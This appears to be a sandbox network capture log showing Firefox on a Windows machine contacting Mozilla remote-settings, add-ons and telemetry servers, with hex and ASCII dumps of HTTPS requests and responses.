2024-07-26 18:11:00 UTC	1390	IN	Data Raw: 6f 45 4d 77 49 49 49 65 0a 4c 6d 4e 76 62 6e 52 6c 62 6e 51 74 63 32 6c 6e 62 6d 46 30 64 58 4a 6c 4c 6d 31 76 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4d 42 2b 43 48 57 4e 76 62 6e 52 6c 62 6e 51 74 63 32 6c 6e 62 6d 46 30 0a 64 58 4a 6c 4c 6d 31 76 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4d 41 30 47 43 53 71 47 53 49 62 33 44 51 45 42 44 41 55 41 41 34 49 43 41 51 41 4c 65 55 75 46 2f 37 68 63 6d 4d 2f 4c 46 6e 4b 36 0a 36 61 35 6c 42 51 6b 35 7a 35 4a 42 72 32 62 4e 4e 76 4b 56 73 2f 6d 74 64 49 63 56 4b 63 78 6a 57 78 4f 42 4d 35 72 6f 72 5a 69 4d 35 55 57 45 37 42 6d 41 6d 38 45 37 67 46 43 43 71 33 30 79 0a 5a 6e 4e 6e 36 42 4f 30 34 7a 35 4c 74 44 52 48 78 61 33 49 47 68 67 45 43 6c 6f 79 4f 4a 55 53 69 39 78 78 46 78 65 35 70 35 77 4a 7a 46 64 41 72 6c 37 Data Ascii: oEMwIIIeLmNvbnRlbnQtc2lnbmF0dXJlLm1vemlsbGEub3JnMB+CHWNvbnRlbnQtc2lnbmF0dXJlLm1vemlsbGEub3JnMA0GCSqGSIb3DQEBDAUAA4ICAQALeUuF/7hcmM/LFnK66a5lBQk5z5JBr2bNNvKVs/mtdIcVKcxjWxOBM5rorZiM5UWE7BmAm8E7gFCCq30yZnNn6BO04z5LtDRHxa3IGhgECloyOJUSi9xxFxe5p5wJzFdArl7
2024-07-26 18:11:00 UTC	1390	IN	Data Raw: 48 0a 4a 62 4c 7a 4d 50 73 49 55 61 75 7a 49 39 47 45 70 4c 66 48 64 5a 36 77 7a 53 79 46 4f 62 34 41 4d 2b 44 31 6d 78 41 57 68 75 5a 4a 33 4d 44 41 4a 4f 66 33 42 31 52 73 36 51 6f 72 48 72 6c 38 0a 71 71 6c 4e 74 50 47 71 65 70 6e 70 4e 4a 63 4c 6f 37 4a 73 53 71 71 45 33 4e 55 6d 37 32 4d 67 71 49 48 52 67 54 52 73 71 55 73 2b 37 4c 49 50 47 65 37 32 36 32 55 2b 4e 2f 54 30 4c 50 59 56 0a 4c 65 34 72 5a 32 52 44 48 6f 61 5a 68 59 59 37 61 39 2b 34 39 6d 48 4f 49 2f 67 32 59 46 42 2b 39 79 5a 6a 45 2b 58 64 70 6c 54 32 6b 42 67 41 34 50 38 64 62 37 69 37 49 30 74 49 69 34 62 30 0a 42 30 4e 36 79 39 4d 68 4c 2b 43 52 5a 4a 79 78 64 46 65 32 77 42 79 6b 4a 58 31 34 4c 73 68 65 4b 73 4d 31 61 7a 48 6a 5a 4f 35 36 53 4b 4e 72 57 38 56 41 4a 54 4c 6b 70 52 Data Ascii: HJbLzMPsIUauzI9GEpLfHdZ6wzSyFOb4AM+D1mxAWhuZJ3MDAJOf3B1Rs6QorHrl8qqlNtPGqepnpNJcLo7JsSqqE3NUm72MgqIHRgTRsqUs+7LIPGe7262U+N/T0LPYVLe4rZ2RDHoaZhYY7a9+49mHOI/g2YFB+9yZjE+XdplT2kBgA4P8db7i7I0tIi4b0B0N6y9MhL+CRZJyxdFe2wBykJX14LsheKsM1azHjZO56SKNrW8VAJTLkpR
2024-07-26 18:11:00 UTC	337	IN	Data Raw: 77 72 54 66 42 33 51 6b 51 51 4a 43 77 66 58 76 4f 39 70 77 6e 50 4b 74 49 53 59 6b 5a 55 71 68 45 71 76 58 6b 35 6e 42 67 0a 51 43 6b 44 53 4c 44 6a 58 54 78 33 39 6e 61 42 42 47 49 56 49 71 42 74 4b 4b 75 56 54 6c 61 39 65 6e 6e 67 64 71 36 39 32 78 58 2f 43 67 4f 36 51 4a 56 72 77 70 71 64 47 6a 65 62 6a 35 50 38 0a 35 66 4e 5a 50 41 42 7a 54 65 7a 47 33 55 6c 73 35 56 70 2b 34 69 49 57 56 41 45 44 6b 4b 32 33 63 55 6a 33 63 2f 48 68 45 2b 4f 6f 37 6b 78 66 55 65 75 35 59 31 5a 56 33 71 72 36 31 2b 36 74 0a 5a 41 52 4b 6a 62 75 31 54 75 59 51 48 66 30 66 73 2b 47 77 49 44 38 7a 65 4c 63 32 7a 4a 4c 37 55 7a 63 48 46 77 77 51 36 4e 64 61 39 4f 4a 4e 34 75 50 41 75 43 2f 42 4b 61 49 70 78 43 4c 4c 0a 32 36 62 32 34 2f 74 52 61 6d 34 53 4a 6a 71 70 69 71 Data Ascii: wrTfB3QkQQJCwfXvO9pwnPKtISYkZUqhEqvXk5nBgQCkDSLDjXTx39naBBGIVIqBtKKuVTla9enngdq692xX/CgO6QJVrwpqdGjebj5P85fNZPABzTezG3Uls5Vp+4iIWVAEDkK23cUj3c/HhE+Oo7kxfUeu5Y1ZV3qr61+6tZARKjbu1TuYQHf0fs+GwID8zeLc2zJL7UzcHFwwQ6Nda9OJN4uPAuC/BKaIpxCLL26b24/tRam4SJjqpiq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	64194	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:00 UTC	359	OUT	GET /v1/buckets/monitor/collections/changes/changeset?collection=quicksuggest&bucket=main&_expected=0 HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:00 UTC	556	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 238 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Backoff, Retry-After, Alert, Content-Type, Content-Length X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:14:24 GMT Age: 3396 Last-Modified: Fri, 26 Jul 2024 16:52:37 GMT Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:00 UTC	238	IN	Data Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 75 63 6b 65 74 22 3a 22 6d 6f 6e 69 74 6f 72 22 7d 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 32 30 31 32 37 35 37 35 31 31 2c 22 63 68 61 6e 67 65 73 22 3a 5b 7b 22 69 64 22 3a 22 33 64 64 62 65 35 34 30 2d 36 39 30 30 2d 33 30 65 66 2d 37 38 35 33 2d 31 39 39 61 33 62 34 62 63 36 64 66 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 37 33 33 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 71 75 69 63 6b 73 75 67 67 65 73 74 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 5d 7d Data Ascii: {"metadata":{"bucket":"monitor"},"timestamp":1722012757511,"changes":[{"id":"3ddbe540-6900-30ef-7853-199a3b4bc6df","last_modified":1721842166733,"bucket":"main","collection":"quicksuggest","host":"firefox.settings.services.mozilla.com"}]}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	64195	18.65.39.112	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:00 UTC	649	OUT	GET /api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-search-detection%40mozilla.com%2Cgoogle%40search.mozilla.org%2Camazondotcom%40search.mozilla.org%2Cwikipedia%40search.mozilla.org%2Cbing%40search.mozilla.org%2Cddg%40search.mozilla.org%2Cfirefox-compact-light%40mozilla.org%2Cfirefox-compact-dark%40mozilla.org%2Cfirefox-alpenglow%40mozilla.org%2Cebay%40search.mozilla.org&lang=en-US HTTP/1.1 Host: services.addons.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:01 UTC	1775	IN	HTTP/1.1 200 OK Content-Type: application/json Content-Length: 82 Connection: close Server: openresty Date: Fri, 26 Jul 2024 18:11:01 GMT Allow: GET, HEAD, OPTIONS X-AMO-Request-ID: 67757f4a8ce940ab8904c5f269686891 ETag: "4f822d39c269d2c47e3174b6c6bad3b7" Content-Security-Policy: object-src 'none'; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/ https://.google-analytics.com https://.googletagmanager.com; default-src 'none'; font-src 'self' https://addons.mozilla.org/static-server/; form-action 'self'; script-src https://.google-analytics.com https://.googletagmanager.com https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; child-src https://www.recaptcha.net/recaptcha/; media-src https://videos.cdn.mozilla.net; connect-src 'self' https://.google-analytics.com https://.analytics.google.com https://*.googletagmanager.com; frame-src https://www.recaptcha.net/recaptcha/; report-uri /__cspreport__ X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin Cache-Control: max-age=3600 Public-Key-Pins: max-age=5184000; includeSubDomains; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E=" Via: 1.1 google, 1.1 13a0a1a7b326f5c854b35536576cfe0e.cloudfront.net (CloudFront) Vary: origin,X-Country-Code,Accept-Language X-Cache: Miss from cloudfront X-Amz-Cf-Pop: AMS1-P1 X-Amz-Cf-Id: p7uA6__O-N9uzltX2ISzeVqTgtCmbqh31uEFlF0RDxSqjbK6ZQob_A==
2024-07-26 18:11:01 UTC	82	IN	Data Raw: 7b 22 70 61 67 65 5f 73 69 7a 65 22 3a 32 35 2c 22 70 61 67 65 5f 63 6f 75 6e 74 22 3a 31 2c 22 63 6f 75 6e 74 22 3a 30 2c 22 6e 65 78 74 22 3a 6e 75 6c 6c 2c 22 70 72 65 76 69 6f 75 73 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 73 22 3a 5b 5d 7d Data Ascii: {"page_size":25,"page_count":1,"count":0,"next":null,"previous":null,"results":[]}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	64196	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	628	OUT	POST /submit/firefox-desktop/messaging-system/1/7755ad51-2370-4623-9d21-15c89f2143db HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-type: application/json; charset=utf-8 content-length: 614 content-encoding: gzip date: Fri, 26 Jul 2024 19:27:28 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:01 UTC	614	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 85 53 cb 6e db 30 10 fc 17 5e 63 ba 24 ad a7 6f 39 04 45 0f 6d 81 38 45 2f 01 04 3e 56 36 51 89 52 49 2a 8e 11 e4 df bb 94 5d 37 ad 8d 14 10 04 69 76 76 77 76 39 7c 21 a3 75 db c6 ba 76 20 eb 17 12 e0 27 59 17 0b 12 a2 f4 b1 89 b6 07 b2 26 82 89 15 e5 8c b2 ec 81 67 eb 8c dd 30 be 66 8c 2c 08 38 f3 7f ce f3 08 1e 39 2e 86 d4 60 1a b7 5e 1a a0 61 1c 62 67 b7 bb 48 fd d0 75 c3 14 53 50 79 e9 f4 0e ab 45 0f 32 a6 9c b9 40 f4 32 45 c1 25 6a 42 3f 19 e4 ac 00 34 af 5a 49 05 2b 4a 9a b1 4a d0 5a e4 40 6b 5d c9 52 64 9c 67 95 c2 f4 78 18 93 3e 67 7b 35 85 73 b3 d7 d7 05 d1 e1 89 da 7e 1c 3c 6a 80 0e 64 80 ab 5a c0 49 d5 01 fd c3 7e 4f 93 92 45 56 2b 4d 15 64 a8 49 d5 82 56 65 21 a8 e0 5a aa bc 54 46 ae de d7 14 c0 8f 54 1a 1a 51 50 Data Ascii: Sn0^c$o9Em8E/>V6QRI*]7ivvwv9\|!uv 'Y&g0f,89.`^abgHuSPyE2@2E%jB?4ZI+JJZ@k]Rdgx>g{5s~<jdZI~OEV+MdIVe!ZTFTQP
2024-07-26 18:11:01 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:01 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	64197	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	465	OUT	POST /submit/messaging-system/undesired-events/1/2485eec1-308e-4770-85b8-7024b1f62cac HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json; charset=UTF-8 Content-Encoding: gzip Date: Fri, 26 Jul 2024 19:27:28 GMT Content-Length: 399 Connection: keep-alive
2024-07-26 18:11:01 UTC	399	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 0a 85 91 41 6f db 30 0c 85 ff 8b ce 61 17 3b 8b 9b e4 d6 43 d1 d3 36 a0 c6 ce 06 23 d1 b1 50 59 f2 28 d9 69 16 e4 bf 8f ea ea e4 12 a0 37 81 e4 fb f4 1e 79 56 f4 3e 10 db 9e 7c 8a 6a 77 56 3a 4e 60 fb 21 70 02 26 47 18 09 38 38 17 c6 94 bb 7b 46 af 3b b5 53 e4 71 ef 08 6e d3 ea b2 50 91 78 00 34 90 44 d8 53 e2 d3 5d a9 0e 3e 49 3d 0b c6 e1 c0 68 08 e2 10 92 b3 87 2e dd 15 24 26 4c d9 60 96 d0 7b 22 1f 6d f0 11 7a 2b ea 24 4f b0 7e f6 7c b4 7f 91 0d 14 45 f5 d5 df 92 3a da 98 20 12 b2 ee c4 33 f7 b3 04 86 2e e7 2e ee 49 af d8 8c e0 60 46 9d e4 fb f8 61 fe 96 7b b2 28 60 9e 88 e1 cd 87 7d bc 92 3f 77 fa 15 79 1c 0c 26 32 73 2a eb 5b a6 3f a3 ac e0 0a ea f1 8d e0 14 46 8e e4 5a c0 04 5d e8 e5 1e 61 38 dd 0f 2c 50 17 34 3a fa 38 1e Data Ascii: Ao0a;C6#PY(i7yV>\|jwV:N`!p&G88{F;SqnPx4DS]>I=h.$&L`{"mz+$O~\|E: 3..I`Fa{(`}?wy&2s*[?FZ]a8,P4:8
2024-07-26 18:11:01 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:01 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	64199	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	421	OUT	GET /v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1720004688246&_since=%221606870304609%22 HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive
2024-07-26 18:11:01 UTC	557	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 1522 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Backoff, Retry-After, Alert, Content-Type, Content-Length X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:17:26 GMT Age: 3215 Last-Modified: Fri, 26 Jul 2024 00:00:05 GMT Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:01 UTC	833	IN	Data Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 73 63 68 65 6d 61 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 72 65 71 75 69 72 65 64 22 3a 5b 22 70 61 74 74 65 72 6e 22 2c 22 66 65 61 74 75 72 65 22 5d 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 66 65 61 74 75 72 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 74 69 74 6c 65 22 3a 22 46 65 61 74 75 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 57 68 69 63 68 20 66 65 61 74 75 72 65 20 74 68 69 73 20 65 6e 74 72 79 20 61 70 70 6c 69 65 73 20 74 6f 20 28 65 2e 67 2e 20 74 72 61 63 6b 69 6e 67 29 22 7d 2c 22 70 61 74 74 65 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 74 69 74 6c 65 22 3a 22 50 61 74 74 65 72 6e 22 2c 22 64 65 73 63 72 69 70 74 69 Data Ascii: {"metadata":{"schema":{"type":"object","required":["pattern","feature"],"properties":{"feature":{"type":"string","title":"Feature","description":"Which feature this entry applies to (e.g. tracking)"},"pattern":{"type":"string","title":"Pattern","descripti
2024-07-26 18:11:01 UTC	689	IN	Data Raw: 50 72 58 58 50 57 56 71 7a 2f 51 55 57 62 74 7a 76 78 74 6b 4b 31 7a 2b 76 54 64 78 66 7a 67 38 59 39 35 2f 6a 75 2f 6a 4c 70 77 59 36 72 6f 64 6b 58 55 38 49 33 6a 70 73 43 77 47 44 51 73 49 6c 41 75 41 63 63 55 42 2f 33 38 49 6b 57 70 70 75 4c 2f 6a 31 55 55 4b 43 35 6c 63 42 31 67 22 7d 2c 22 64 69 73 70 6c 61 79 46 69 65 6c 64 73 22 3a 5b 22 70 61 74 74 65 72 6e 22 2c 22 66 65 61 74 75 72 65 22 5d 2c 22 69 64 22 3a 22 75 72 6c 2d 63 6c 61 73 73 69 66 69 65 72 2d 73 6b 69 70 2d 75 72 6c 73 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 39 35 32 30 30 35 37 31 39 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 7d 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 30 30 30 34 36 38 38 32 34 36 2c 22 63 68 61 6e 67 65 73 22 3a 5b 7b 22 64 Data Ascii: PrXXPWVqz/QUWbtzvxtkK1z+vTdxfzg8Y95/ju/jLpwY6rodkXU8I3jpsCwGDQsIlAuAccUB/38IkWppuL/j1UUKC5lcB1g"},"displayFields":["pattern","feature"],"id":"url-classifier-skip-urls","last_modified":1721952005719,"bucket":"main"},"timestamp":1720004688246,"changes":[{"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	64202	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	382	OUT	GET /v1/buckets/main/collections/quicksuggest/changeset?_expected=1721842166733 HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive
2024-07-26 18:11:01 UTC	558	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 48190 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Backoff, Content-Type, Retry-After, Content-Length, Alert X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:22:47 GMT Age: 2894 Last-Modified: Wed, 24 Jul 2024 17:29:26 GMT Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:01 UTC	832	IN	Data Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 73 63 68 65 6d 61 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 69 64 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 7d 7d 7d 2c 22 73 69 67 6e 61 74 75 72 65 22 3a 7b 22 72 65 66 22 3a 22 61 39 78 67 33 79 68 37 77 61 6a 72 32 6c 7a 61 78 6e 77 6a 37 34 30 6e 35 22 2c 22 78 35 75 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 73 69 67 6e 61 74 75 72 65 2d 32 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 63 68 61 69 6e 73 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 63 6f 6e 74 65 6e 74 2d 73 69 67 6e 61 74 75 72 65 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2d 32 30 32 34 2d 30 38 2d 32 39 2d 31 33 2d 35 30 2d 35 39 2e 63 68 61 69 6e 22 Data Ascii: {"metadata":{"schema":{"type":"object","properties":{"id":{"type":"string"}}},"signature":{"ref":"a9xg3yh7wajr2lzaxnwj740n5","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-08-29-13-50-59.chain"
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 31 38 34 30 37 35 30 34 34 31 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 38 38 34 31 38 33 61 66 30 31 38 64 34 31 33 31 65 31 63 62 38 37 61 30 35 33 61 38 65 39 31 32 62 64 36 62 34 62 36 63 34 36 64 66 66 35 33 31 65 38 32 37 63 39 65 31 31 65 36 63 64 33 63 64 22 2c 22 73 69 7a 65 22 3a 38 31 33 31 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 34 39 31 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 71 75 69 63 6b 73 75 67 67 65 73 74 2f 66 35 63 32 64 38 32 30 2d 64 63 61 64 2d 34 38 34 36 2d 62 30 64 35 2d 34 65 37 33 64 66 65 33 66 62 38 39 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 Data Ascii: 1840750441,"attachment":{"hash":"884183af018d4131e1cb87a053a8e912bd6b4b6c46dff531e827c9e11e6cd3cd","size":8131,"filename":"icon-715212280871491","location":"main-workspace/quicksuggest/f5c2d820-dcad-4846-b0d5-4e73dfe3fb89","mimetype":"application/octet-st
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 74 65 6e 74 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 69 64 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 38 37 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 37 32 32 7d 2c 7b 22 74 79 70 65 22 3a 22 69 63 6f 6e 22 2c 22 73 63 68 65 6d 61 22 3a 31 37 32 31 38 34 30 37 33 35 33 39 32 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 30 33 34 36 30 34 32 30 33 39 66 34 62 66 31 33 38 64 37 36 34 33 35 34 36 33 38 66 38 63 36 63 37 63 35 61 31 62 30 36 30 64 35 38 36 66 30 65 65 36 34 34 62 62 39 37 65 34 37 34 39 66 39 39 22 2c 22 73 69 7a 65 22 3a 31 35 30 30 30 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 31 36 31 33 35 31 38 34 32 30 37 34 32 34 35 22 2c 22 Data Ascii: tent_type":"image/png","id":"icon-71521228087187","last_modified":1721842166722},{"type":"icon","schema":1721840735392,"attachment":{"hash":"0346042039f4bf138d764354638f8c6c7c5a1b060d586f0ee644bb97e4749f99","size":15000,"filename":"icon-161351842074245","
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 71 75 69 63 6b 73 75 67 67 65 73 74 2f 38 65 62 32 38 66 32 33 2d 39 33 61 65 2d 34 31 38 36 2d 38 37 65 36 2d 30 64 66 62 35 66 30 62 31 36 38 30 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 2c 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 69 64 22 3a 22 69 63 6f 6e 2d 37 31 35 32 31 32 32 38 30 38 37 31 35 31 33 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 34 32 31 36 36 37 31 32 7d 2c 7b 22 74 79 70 65 22 3a 22 69 63 6f 6e 22 2c 22 73 63 68 65 6d 61 22 3a 31 37 32 31 38 34 30 37 34 37 36 30 34 2c 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 66 34 Data Ascii: :"main-workspace/quicksuggest/8eb28f23-93ae-4186-87e6-0dfb5f0b1680","mimetype":"application/octet-stream"},"content_type":"image/png","id":"icon-715212280871513","last_modified":1721842166712},{"type":"icon","schema":1721840747604,"attachment":{"hash":"f4
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 65 39 32 34 37 33 65 61 63 65 63 65 37 39 62 65 33 38 31 35 62 62 36 37 66 34 64 31 38 36 39 38 38 61 65 32 36 66 33 63 36 65 30 33 30 30 31 35 65 37 35 35 22 2c 22 73 69 7a 65 22 3a 32 34 36 35 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 69 63 6f 6e 2d 31 36 31 33 35 31 38 34 32 30 37 34 35 32 31 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 71 75 69 63 6b 73 75 67 67 65 73 74 2f 66 31 31 63 31 62 62 61 2d 30 64 32 65 2d 34 34 64 38 2d 61 63 62 31 2d 65 33 37 35 37 31 39 64 64 38 62 38 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 2c 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 69 64 22 3a 22 69 63 6f 6e 2d Data Ascii: 